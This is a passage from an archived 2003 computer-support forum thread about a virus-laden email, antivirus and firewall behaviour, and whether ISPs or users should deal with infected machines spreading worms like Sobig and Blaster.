    > >Outgoing mail is certified Virus Free.
    > >Checked by AVG anti-virus system (http://www.grisoft.com).
    > >Version: 6.0.514 / Virus Database: 312 - Release Date: 28/08/2003
    > >

    > So AVG missed this then.....
    >
    > Me



    ---
    Outgoing mail is certified Virus Free.
    Checked by AVG anti-virus system (http://www.grisoft.com).
    Version: 6.0.514 / Virus Database: 312 - Release Date: 28/08/2003
    Cheekycharlie, Aug 29, 2003
    #6
  7. Cheekycharlie

    Buffalo Guest

    Sure looks like it did.


    > Ha Ha what a joke, the virus code renamed .zl9 by ZoneAlarm then the
    > bottom of the post says it's virus free.......
    > So AVG missed this then.....
    >
    > Me
    Buffalo, Aug 29, 2003
    #7
  8. Cheekycharlie

    Buffalo Guest

    "Cheekycharlie" ...
    > No actually Avg saved it!
    > And anyway if you know so much about this virus, which I dont suppose you
    > do, why didnt you reply with a half decent answer.
    > I know that Microsoft didnt send this virus, and I know now who did, but

    no
    > thanks to you.
    > All praise goes to MARA!
    > CC:)

    It really sounds like ZoneAlarm found it first (saving it immediately) and
    renamed the ext (.exe) to .zl9 so that you couldnt' have opened it unless
    you went through several 'Are you really sure you want to open this' type
    warnings from ZA.
    And , as Mara says:
    "And please do not post virus code in 24HSHD again."
    BTW, when you have a question like this, you can usually find the answer
    quickly yourself by using a search engine like Google.
    Buffalo, Aug 29, 2003
    #8
  9. Cheekycharlie

    Buffalo Guest

    BTW Cheekycharlie, never post your real e-mail addy in a newsgroup like you
    did when you posted the contents of your email unless you really want a lot
    more SPAM.

    "Buffalo"...
    >
    Buffalo, Aug 29, 2003
    #9
  10. Cheekycharlie

    why? Guest

    On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:

    >No actually Avg saved it!


    AVG uses .zl9 extensions? That's zonealarm. It's a very simply base 64
    encode and your software still said it was virus free and let you post
    it go figure.

    >And anyway if you know so much about this virus, which I dont suppose you


    What the virus is does not matter, besides information has been posted
    about it on so many sites (Mcafee , Symantec bulletins) and other
    threads. Any mail like should be simply ignored and deleted, or the AV
    vendor sites checked.

    >do, why didnt you reply with a half decent answer.


    It was too easy?

    >I know that Microsoft didnt send this virus, and I know now who did, but no
    >thanks to you.


    That's really nice.

    <snip>


    So you couldn't see the one line then, that started - Received: from.

    Received: from cpe00d009ecf327-cm014100200957.cpe.net.cable.rogers.com
    ([24.157.151.57] helo=localhost)


    >CC:)
    >"why?" <fgrirp*sgc@VAINY!Qznq.fpvragvfg.pbz> wrote in message
    >news:...
    >> X-No-Archive: Yes
    >> On Fri, 29 Aug 2003 20:25:39 +0000 (UTC), Cheekycharlie wrote:
    >>
    >> Ha Ha what a joke, the virus code renamed .zl9 by ZoneAlarm then the
    >> bottom of the post says it's virus free.......
    >>
    >> >Hi,
    >> >I recently received this email with an attachment that had a virus

    >attached
    >> >to it.
    >> >Im not sure who it came from, but it certainly was not Microsoft.

    >> <snip>


    <snip>

    Me
    why?, Aug 29, 2003
    #10
  11. Cheekycharlie

    Mara Guest

    On Fri, 29 Aug 2003 22:39:48 GMT, why? wrote:

    >
    >On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:
    >
    >>No actually Avg saved it!

    >
    >AVG uses .zl9 extensions? That's zonealarm. It's a very simply base 64
    >encode and your software still said it was virus free and let you post
    >it go figure.
    >
    >>And anyway if you know so much about this virus, which I dont suppose you

    >
    >What the virus is does not matter, besides information has been posted
    >about it on so many sites (Mcafee , Symantec bulletins) and other
    >threads. Any mail like should be simply ignored and deleted, or the AV
    >vendor sites checked.


    Well, actually, it _should_ be reported so the host can insist that the sending
    machine be cleaned up. That's of course assuming that the host actually cares;
    there are still machines spewing Nimda, CodeRed and the like about, with hosts
    knowing and not doing anything about it. Perhaps it's not so odd that the hosts
    in question generally have...other problems, as well.

    "If you know what I mean."

    <snip>

    --
    "Sufficiently advanced incompetence is indistinguishable
    from malice." -- Vernon Schryver
    Mara, Aug 30, 2003
    #11
  12. Cheekycharlie

    why? Guest

    X-No-Archive: Yes
    On Fri, 29 Aug 2003 23:01:47 -0500, Mara wrote:

    >On Fri, 29 Aug 2003 22:39:48 GMT, why? wrote:
    >
    >>
    >>On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:
    >>
    >>>No actually Avg saved it!

    >>
    >>AVG uses .zl9 extensions? That's zonealarm. It's a very simply base 64
    >>encode and your software still said it was virus free and let you post
    >>it go figure.
    >>
    >>>And anyway if you know so much about this virus, which I dont suppose you

    >>
    >>What the virus is does not matter, besides information has been posted
    >>about it on so many sites (Mcafee , Symantec bulletins) and other
    >>threads. Any mail like should be simply ignored and deleted, or the AV
    >>vendor sites checked.

    >
    >Well, actually, it _should_ be reported so the host can insist that the sending
    >machine be cleaned up. That's of course assuming that the host actually cares;


    I see that point of course, but someone could spend weeks sending
    reports in and more arrives from new addresses. It's about time the ISPs
    took a lot more of this on, it only takes 1 report to disable an account
    while the PC is cleaned and proved to be so (difficult but not
    impossible).

    I would even pay extra to the ISP if they had good anti spam / anti worm
    policy, after all the end user is only the one that gets hit by whatever
    is spreading around. To get to the end user's PC however it had to go
    through the ISP systems.

    >there are still machines spewing Nimda, CodeRed and the like about, with hosts


    I still see these (sometimes) in my packet capture logs. Right now
    (rather for the last 2 weeks ) the broadcasts (ARPs) have risen from a
    few Kbits to constant 18-30Kbits/sec on the activity light on the cable
    modem.

    If I can tell in a minute or two one (or a hundred) PC(s) are searching
    for addresses
    x.x.x.1 x.x.x.2 x.x.x.3 etc.

    Then it's not beyond the ISP ability to say why is a PC scanning
    consecutive addresses. Why is it up to the end user to block these
    because hundreds of other non savvy users don't have firewalls, AV anti
    spam measures?

    Surely the ISP could give the users a short reminder about , spam ,
    Usent munge, AV etc when joining and any PC (my ISP runs an open port
    scanner against user PCs) must have at least basic protection if you
    want to connect out (ISPs) network.

    >knowing and not doing anything about it. Perhaps it's not so odd that the hosts
    >in question generally have...other problems, as well.


    Like an unpatched MS OS :)

    <snip>

    Me
    why?, Aug 30, 2003
    #12
  13. Cheekycharlie

    Mara Guest

    On Sat, 30 Aug 2003 11:10:58 GMT, why? wrote:

    >X-No-Archive: Yes
    >On Fri, 29 Aug 2003 23:01:47 -0500, Mara wrote:
    >
    >>On Fri, 29 Aug 2003 22:39:48 GMT, why? wrote:
    >>
    >>>
    >>>On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:
    >>>
    >>>>No actually Avg saved it!
    >>>
    >>>AVG uses .zl9 extensions? That's zonealarm. It's a very simply base 64
    >>>encode and your software still said it was virus free and let you post
    >>>it go figure.
    >>>
    >>>>And anyway if you know so much about this virus, which I dont suppose you
    >>>
    >>>What the virus is does not matter, besides information has been posted
    >>>about it on so many sites (Mcafee , Symantec bulletins) and other
    >>>threads. Any mail like should be simply ignored and deleted, or the AV
    >>>vendor sites checked.

    >>
    >>Well, actually, it _should_ be reported so the host can insist that the sending
    >>machine be cleaned up. That's of course assuming that the host actually cares;

    >
    >I see that point of course, but someone could spend weeks sending
    >reports in and more arrives from new addresses. It's about time the ISPs
    >took a lot more of this on, it only takes 1 report to disable an account
    >while the PC is cleaned and proved to be so (difficult but not
    >impossible).


    I agree. But in the end, the luser is responsible for his own system and should
    at least be knowledgeable enough, before he ever connects, to be able to take
    steps to protect himself from the kind of garbage that's floating around today.
    There is no excuse not to, really; the information is readily available. But
    there is a lot the hosts can be doing, too. Some do - mine does - but some
    don't. And even though it's hard to believe, in this day and age, there are
    hosts who simply do not know _how_ to deal with this. There are a great many who
    appear to be only "in it for the bucks" and don't care whether their clients,
    and thus their network, is spewing. It may sound cynical, but it isn't; it's
    reality.

    Personally, I pull the plug. No clean, no account. End of discussion.

    >
    >I would even pay extra to the ISP if they had good anti spam / anti worm
    >policy, after all the end user is only the one that gets hit by whatever
    >is spreading around. To get to the end user's PC however it had to go
    >through the ISP systems.


    Mine does. It uses SpamAssassin. And I don't have to pay extra. Of course I'm
    personally behind a NAT router, too, which helps on some stuff.

    It's a shame that Joe Jared has shut up shop. relays.osirusoft.com made a
    difference. But after six weeks of being continually DoSsed in a spite move by a
    spammer, I can see why he burned out. There have been times lately when I've
    felt pretty much the same way myself.

    >
    >>there are still machines spewing Nimda, CodeRed and the like about, with hosts

    >
    >I still see these (sometimes) in my packet capture logs. Right now
    >(rather for the last 2 weeks ) the broadcasts (ARPs) have risen from a
    >few Kbits to constant 18-30Kbits/sec on the activity light on the cable
    >modem.
    >
    >If I can tell in a minute or two one (or a hundred) PC(s) are searching
    >for addresses
    >x.x.x.1 x.x.x.2 x.x.x.3 etc.


    This morning, I am seeing massive connection attempts, mainly from one machine
    on he.net (Hurricane Electric.) This comes as no surprise; they have quite a
    reputation in my world, and it isn't a good one. Since Sobig is also being used
    as a spamming vector from what I read, this is rather expected. Slime is
    everywhere, these days.

    Ho hum.

    >Then it's not beyond the ISP ability to say why is a PC scanning
    >consecutive addresses. Why is it up to the end user to block these
    >because hundreds of other non savvy users don't have firewalls, AV anti
    >spam measures?


    The host may not even be aware of it. Not all check their logs, sorry to say.

    In the end, it is the luser's responsibility. I say this because the host does
    not own the machine the luser is using; the luser does, and as such, it is his
    equipment and his responsibility. Those same rules apply to hosts, of course,
    but no one can do everything, and there are only so many hours in the day. The
    key is education, both in groups like this one and with hosts. But as in all
    things, there are some who learn, and some who don't; some who want to, and some
    who won't.

    In the end, there is only one real truth to being online.

    "My network (my machine,) my rules."

    Therefore, what happens on my LAN, or my machine, is _my_ responsibility.
    Whether I have 20 users or two million, or two. Or whether I own a single
    machine that I use to connect through another host. I can't control what someone
    else allows into their machine, because it's their machine, but I _can_ see to
    it that if they're on my WAN and signed my AUP/TOS and they're infected, that
    they're shut down until they're cleaned. If I have 2 million users, though, I'm
    not going to be able to check each and every one; that's simply humanly
    impossible. That's where the complaints come in. They are _necessary_. Because
    some of us _do_ care and will take immediate steps.

    I'm probably not making much sense at this point, but it's been a very long
    week, and I'm very tired.

    >
    >Surely the ISP could give the users a short reminder about , spam ,
    >Usent munge, AV etc when joining and any PC (my ISP runs an open port
    >scanner against user PCs) must have at least basic protection if you
    >want to connect out (ISPs) network.


    They should, and mine does, but not everyone cares, and not all users retain
    information or care themselves.

    >
    >>knowing and not doing anything about it. Perhaps it's not so odd that the hosts
    >>in question generally have...other problems, as well.

    >
    >Like an unpatched MS OS :)


    Yes. In fact, from my end, that's _most_ of the problem.

    "Well, that and hosts that don't educate, and lusers that refuse to educate
    themselves - neither of which do I understand, since the information is so very
    readily available for _everyone._"

    >
    ><snip>
    >
    >Me


    --
    "Sufficiently advanced incompetence is indistinguishable
    from malice." -- Vernon Schryver
    Mara, Aug 30, 2003
    #13
  14. Cheekycharlie

    why? Guest

    X-No-Archive: Yes
    On Sat, 30 Aug 2003 09:40:33 -0500, Mara wrote:

    Hi,

    >On Sat, 30 Aug 2003 11:10:58 GMT, why? wrote:
    >
    >>X-No-Archive: Yes
    >>On Fri, 29 Aug 2003 23:01:47 -0500, Mara wrote:
    >>
    >>>On Fri, 29 Aug 2003 22:39:48 GMT, why? wrote:
    >>>
    >>>>
    >>>>On Fri, 29 Aug 2003 21:47:50 +0000 (UTC), Cheekycharlie wrote:
    >>>>
    >>>>>No actually Avg saved it!
    >>>>
    >>>>AVG uses .zl9 extensions? That's zonealarm. It's a very simply base 64
    >>>>encode and your software still said it was virus free and let you post
    >>>>it go figure.

    <snip>
    >>>>threads. Any mail like should be simply ignored and deleted, or the AV
    >>>>vendor sites checked.
    >>>
    >>>Well, actually, it _should_ be reported so the host can insist that the sending
    >>>machine be cleaned up. That's of course assuming that the host actually cares;

    >>
    >>I see that point of course, but someone could spend weeks sending
    >>reports in and more arrives from new addresses. It's about time the ISPs
    >>took a lot more of this on, it only takes 1 report to disable an account
    >>while the PC is cleaned and proved to be so (difficult but not
    >>impossible).

    >
    >I agree. But in the end, the luser is responsible for his own system and should
    >at least be knowledgeable enough, before he ever connects, to be able to take
    >steps to protect himself from the kind of garbage that's floating around today.
    >There is no excuse not to, really; the information is readily available. But
    >there is a lot the hosts can be doing, too. Some do - mine does - but some


    Sounds like work too much, I mean the Mon-Fri sort. We have been
    getting 'panic' messages in our nice multi bold, colored , mixed font
    red 1 " high 'STOP!! Action to perform'. To install the attached exe (MS
    patches) after having been told never to run attachments. Then after
    that is the same in 24HSHD at the weekends.

    >don't. And even though it's hard to believe, in this day and age, there are
    >hosts who simply do not know _how_ to deal with this. There are a great many who


    Add companies to 'hosts' :)

    <snip>

    >>I would even pay extra to the ISP if they had good anti spam / anti worm
    >>policy, after all the end user is only the one that gets hit by whatever
    >>is spreading around. To get to the end user's PC however it had to go
    >>through the ISP systems.

    >
    >Mine does. It uses SpamAssassin. And I don't have to pay extra. Of course I'm
    >personally behind a NAT router, too, which helps on some stuff.


    NAT router (home as well) and in case of a flaw , lack of update the PCs
    run mixed AV / FW from different places.

    Thanks for the heads up on SA, just had a look at the webpages, very
    interesting.

    >It's a shame that Joe Jared has shut up shop. relays.osirusoft.com made a
    >difference. But after six weeks of being continually DoSsed in a spite move by a
    >spammer, I can see why he burned out. There have been times lately when I've
    >felt pretty much the same way myself.
    >
    >>
    >>>there are still machines spewing Nimda, CodeRed and the like about, with hosts

    >>
    >>I still see these (sometimes) in my packet capture logs. Right now
    >>(rather for the last 2 weeks ) the broadcasts (ARPs) have risen from a
    >>few Kbits to constant 18-30Kbits/sec on the activity light on the cable
    >>modem.
    >>
    >>If I can tell in a minute or two one (or a hundred) PC(s) are searching
    >>for addresses
    >>x.x.x.1 x.x.x.2 x.x.x.3 etc.

    >
    >This morning, I am seeing massive connection attempts, mainly from one machine
    >on he.net (Hurricane Electric.) This comes as no surprise; they have quite a

    <snip>

    >
    >In the end, there is only one real truth to being online.
    >
    >"My network (my machine,) my rules."


    Nice one, at works it's 'my network, company machine and you did what?'

    <snip>
    >they're shut down until they're cleaned. If I have 2 million users, though, I'm
    >not going to be able to check each and every one; that's simply humanly
    >impossible. That's where the complaints come in. They are _necessary_. Because
    >some of us _do_ care and will take immediate steps.
    >
    >I'm probably not making much sense at this point, but it's been a very long
    >week, and I'm very tired.


    Lots of sense.

    Thanks for the comprehensive reply.

    <snip>

    Me
    why?, Aug 30, 2003
    #14
  15. Cheekycharlie

    Mara Guest

    On Sat, 30 Aug 2003 18:05:49 GMT, why? wrote:

    <snip>
    >>I agree. But in the end, the luser is responsible for his own system and should
    >>at least be knowledgeable enough, before he ever connects, to be able to take
    >>steps to protect himself from the kind of garbage that's floating around today.
    >>There is no excuse not to, really; the information is readily available. But
    >>there is a lot the hosts can be doing, too. Some do - mine does - but some

    >
    >Sounds like work too much, I mean the Mon-Fri sort. We have been
    >getting 'panic' messages in our nice multi bold, colored , mixed font
    >red 1 " high 'STOP!! Action to perform'. To install the attached exe (MS
    >patches) after having been told never to run attachments. Then after
    >that is the same in 24HSHD at the weekends.


    No Mon-Fri here. I'm working my regular job, taking care of panicked luser's
    systems, and working on my new home, by myself, when I get done with all that.
    I've had some 20+ hour days, lately. But I'll be moving soon, and that should
    make things a bit easier - except for the panicked lusers, of course.
    SpamAssassin doesn't stop Blaster. At least, not yet. And my router log is full
    of Sobig connection attempts.

    It's a great life, if you don't weaken. Or collapse.

    >
    >>don't. And even though it's hard to believe, in this day and age, there are
    >>hosts who simply do not know _how_ to deal with this. There are a great many who

    >
    >Add companies to 'hosts' :)


    I'd rather not, if you know what I mean. :(

    >
    ><snip>
    >
    >>>I would even pay extra to the ISP if they had good anti spam / anti worm
    >>>policy, after all the end user is only the one that gets hit by whatever
    >>>is spreading around. To get to the end user's PC however it had to go
    >>>through the ISP systems.

    >>
    >>Mine does. It uses SpamAssassin. And I don't have to pay extra. Of course I'm
    >>personally behind a NAT router, too, which helps on some stuff.

    >
    >NAT router (home as well) and in case of a flaw , lack of update the PCs
    >run mixed AV / FW from different places.


    I run three different updated AVs myself. And I keep my systems patched - to a
    point. I will not upgrade 2k beyond SP 2, but I do install the patches I can.

    >
    >Thanks for the heads up on SA, just had a look at the webpages, very
    >interesting.


    It's very good but it _is_ a bit of a resource hog, depending on how it's
    configured.

    <snip>
    >>In the end, there is only one real truth to being online.
    >>
    >>"My network (my machine,) my rules."

    >
    >Nice one, at works it's 'my network, company machine and you did what?'


    I'd rather have that than "I won't even breathe near it unless you say it's ok."
    That's flattering, but also a gigantic PITA.

    >
    ><snip>
    >>they're shut down until they're cleaned. If I have 2 million users, though, I'm
    >>not going to be able to check each and every one; that's simply humanly
    >>impossible. That's where the complaints come in. They are _necessary_. Because
    >>some of us _do_ care and will take immediate steps.
    >>
    >>I'm probably not making much sense at this point, but it's been a very long
    >>week, and I'm very tired.

    >
    >Lots of sense.
    >
    >Thanks for the comprehensive reply.


    You are welcome. :)


    >
    ><snip>
    >
    >Me


    --
    "Sufficiently advanced incompetence is indistinguishable
    from malice." -- Vernon Schryver
    Mara, Aug 30, 2003
    #15
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Raine

    New Virus Alert !!

    Raine, Oct 3, 2003, in forum: Computer Support
    Replies:
    28
    Views:
    850
    William Poaster
    Oct 4, 2003
  2. Jihem_France_45

    VIRUS ALERT !!!!!!!

    Jihem_France_45, Oct 29, 2003, in forum: Computer Support
    Replies:
    18
    Views:
    709
    William Poaster
    Oct 31, 2003
  3. Toronto Garage Door Company

    ALERT: Virus Scam Alert!

    Toronto Garage Door Company, Nov 18, 2003, in forum: Computer Support
    Replies:
    1
    Views:
    753
    andre
    Nov 18, 2003
  4. the niner nation

    Norton anti-virus 2003 alert warning

    the niner nation, Nov 20, 2003, in forum: Computer Support
    Replies:
    2
    Views:
    497
    Roland
    Nov 21, 2003
  5. =?Utf-8?B?U3BhbW1lcipLaWxsZXI=?=

    Alert..General Alert?..New Discovery?.

    =?Utf-8?B?U3BhbW1lcipLaWxsZXI=?=, Jul 24, 2007, in forum: Wireless Networking
    Replies:
    0
    Views:
    552
    =?Utf-8?B?U3BhbW1lcipLaWxsZXI=?=
    Jul 24, 2007
Loading...

Share This Page